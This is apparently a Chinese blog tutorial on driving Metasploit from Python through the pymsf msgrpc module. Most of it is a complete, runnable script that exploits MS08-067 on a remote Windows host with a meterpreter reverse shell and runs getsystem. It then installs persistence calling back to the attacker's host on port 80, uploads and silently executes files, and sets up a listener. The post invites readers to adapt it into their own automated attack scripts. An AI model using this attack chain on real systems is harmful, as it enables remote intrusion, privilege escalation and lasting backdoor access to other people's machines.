教你用Python玩轉(zhuǎn)神器Metasploit
pymsf是著名安全研究團(tuán)隊(duì)Spiderlabs實(shí)現(xiàn)的一個Python與Metasploit msgrpc進(jìn)行通信的python模塊,通過它,你可以利用Python玩轉(zhuǎn)滲透測試框架Metasploit。
使用步驟
首先你需要先啟動msgrpc服務(wù),命令如下:
load msgrpc Pass=<password>
與msgrpc進(jìn)行通信其實(shí)就是與msfconsole進(jìn)行通信,首先你需要創(chuàng)建一個msfrpc的類,登錄到msgrpc服務(wù)器并且創(chuàng)建一個虛擬的終端,然后你就可以在你創(chuàng)建的虛擬終端上面執(zhí)行多個命令的字符串.你可以調(diào)用模塊的方法與console.write執(zhí)行命令,并且通過"console.read"從虛擬終端上面讀取輸入的值.這篇文章將演示如何使用pymsf模塊并且如何開發(fā)出一個完整的腳本.
這里有一個函數(shù)它創(chuàng)建了一個msfrpc實(shí)例,登錄到msgrpc服務(wù)器,并且創(chuàng)建了一個虛擬終端.
def sploiter(RHOST, LHOST, LPORT, session): client = msfrpc.Msfrpc({}) client.login('msf', '123') ress = client.call('console.create') console_id = ress['id']
下一步就是實(shí)現(xiàn)把多個字符串發(fā)給虛擬終端,通過console.write和console.read在虛擬終端顯示與讀取:
## Exploit MS08-067 ## commands = """use exploit/windows/smb/ms08_067_netapi set PAYLOAD windows/meterpreter/reverse_tcp set RHOST """+RHOST+""" set LHOST """+LHOST+""" set LPORT """+LPORT+""" set ExitOnSession false exploit -z """print "[+] Exploiting MS08-067 on: "+RHOST client.call('console.write',[console_id,commands]) res = client.call('console.read',[console_id]) result = res['data'].split('\n')
上面的這一小段代碼創(chuàng)建了一個MSF的資源文件,這樣你就可以通過"resoucen"命令去執(zhí)行指定文件里面中一系列的命令。
下面我們將通過"getsystem"命令把這個文件的提權(quán),建立一個后門打開80端口來轉(zhuǎn)發(fā).并且永久的運(yùn)行.最后上傳我們的漏洞exp并且在命令模式下面悄悄的安裝:
# 這個函數(shù)會創(chuàng)建一個MSF .rc文件def builder(RHOST, LHOST, LPORT): post = open('/tmp/smbpost.rc', 'w') bat = open('/tmp/ms08067_install.bat', 'w') postcomms = """getsystem run persistence -S -U -X -i 10 -p 80 -r """+LHOST+""" cd c:\\ upload /tmp/ms08067_patch.exe c:\\ upload /tmp/ms08067_install.bat c:\\ execute -f ms08067_install.bat """ batcomm = "ms08067_patch.exe /quiet" post.write(postcomms); bat.write(batcomm) post.close(); bat.close()
通過上面的那段代碼,將會創(chuàng)建一個.rc的文件.通過msf模塊“post/multi/gather/run_console_rc_file”在當(dāng)前的meterpreter會話中運(yùn)行生成的文件,并且通過console.write命令從虛擬終端寫入數(shù)據(jù),通過console.read命令來回顯返回內(nèi)容:
## 運(yùn)行生成的exp ## runPost = """use post/multi/gather/run_console_rc_file set RESOURCE /tmp/smbpost.rc set SESSION """+session+""" exploit """ print "[+] Running post-exploit script on: "+RHOST client.call('console.write',[console_id,runPost]) rres = client.call('console.read',[console_id])## Setup Listener for presistent connection back over port 80 ## sleep(10) listen = """use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LPORT 80 set LHOST """+LHOST+""" exploit """print "[+] Setting up listener on: "+LHOST+":80" client.call('console.write',[console_id,listen]) lres = client.call('console.read',[console_id])print lres
上面代碼中的變量(RHOST, LHOST,LPORT等)都是通過optparse模塊從命令終端輸入的,完整的腳本托管在github上面,有時候你需要知道腳本的生成的地方都是靜態(tài)地址,不會在其他的目錄生成,例如ms08067的補(bǔ)丁就會在你的/tmp/目錄下面。
大家只要知道基礎(chǔ)然后對下面的代碼進(jìn)行一定的修改就可以編程一個屬于你自己的msf自動化攻擊腳本,我們建議通過博客里面發(fā)表的一些簡單的例子出發(fā),然后自己寫一個msf攻擊腳本:
import os, msfrpc, optparse, sys, subprocess from time import sleep # Function to create the MSF .rc filesdef builder(RHOST, LHOST, LPORT): post = open('/tmp/smbpost.rc', 'w') bat = open('/tmp/ms08067_install.bat', 'w') postcomms = """getsystem run persistence -S -U -X -i 10 -p 80 -r """+LHOST+""" cd c:\\ upload /tmp/ms08067_patch.exe c:\\ upload /tmp/ms08067_install.bat c:\\ execute -f ms08067_install.bat """ batcomm = "ms08067_patch.exe /quiet" post.write(postcomms); bat.write(batcomm) post.close(); bat.close()# Exploits the chain of rc files to exploit MS08-067, setup persistence, and patchdef sploiter(RHOST, LHOST, LPORT, session): client = msfrpc.Msfrpc({}) client.login('msf', '123') ress = client.call('console.create') console_id = ress['id']## Exploit MS08-067 ## commands = """use exploit/windows/smb/ms08_067_netapi set PAYLOAD windows/meterpreter/reverse_tcp set RHOST """+RHOST+""" set LHOST """+LHOST+""" set LPORT """+LPORT+""" set ExitOnSession false exploit -z """ print "[+] Exploiting MS08-067 on: "+RHOST client.call('console.write',[console_id,commands]) res = client.call('console.read',[console_id]) result = res['data'].split('\n')## Run Post-exploit script ## runPost = """use post/multi/gather/run_console_rc_file set RESOURCE /tmp/smbpost.rc set SESSION """+session+""" exploit """ print "[+] Running post-exploit script on: "+RHOST client.call('console.write',[console_id,runPost]) rres = client.call('console.read',[console_id])## Setup Listener for presistent connection back over port 80 ## sleep(10) listen = """use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LPORT 80 set LHOST """+LHOST+""" exploit """ print "[+] Setting up listener on: "+LHOST+":80" client.call('console.write',[console_id,listen]) lres = client.call('console.read',[console_id]) print lres def main(): parser = optparse.OptionParser(sys.argv[0] +\ ' -p LPORT -r RHOST -l LHOST') parser.add_option('-p', dest='LPORT', type='string', \ help ='specify a port to listen on') parser.add_option('-r', dest='RHOST', type='string', \ help='Specify a remote host') parser.add_option('-l', dest='LHOST', type='string', \ help='Specify a local host') parser.add_option('-s', dest='session', type='string', \ help ='specify session ID') (options, args) = parser.parse_args() session=options.session RHOST=options.RHOST; LHOST=options.LHOST; LPORT=options.LPORT if (RHOST == None) and (LPORT == None) and (LHOST == None): print parser.usage sys.exit(0) builder(RHOST, LHOST, LPORT) sploiter(RHOST, LHOST, LPORT, session)if __name__ == "__main__": main()
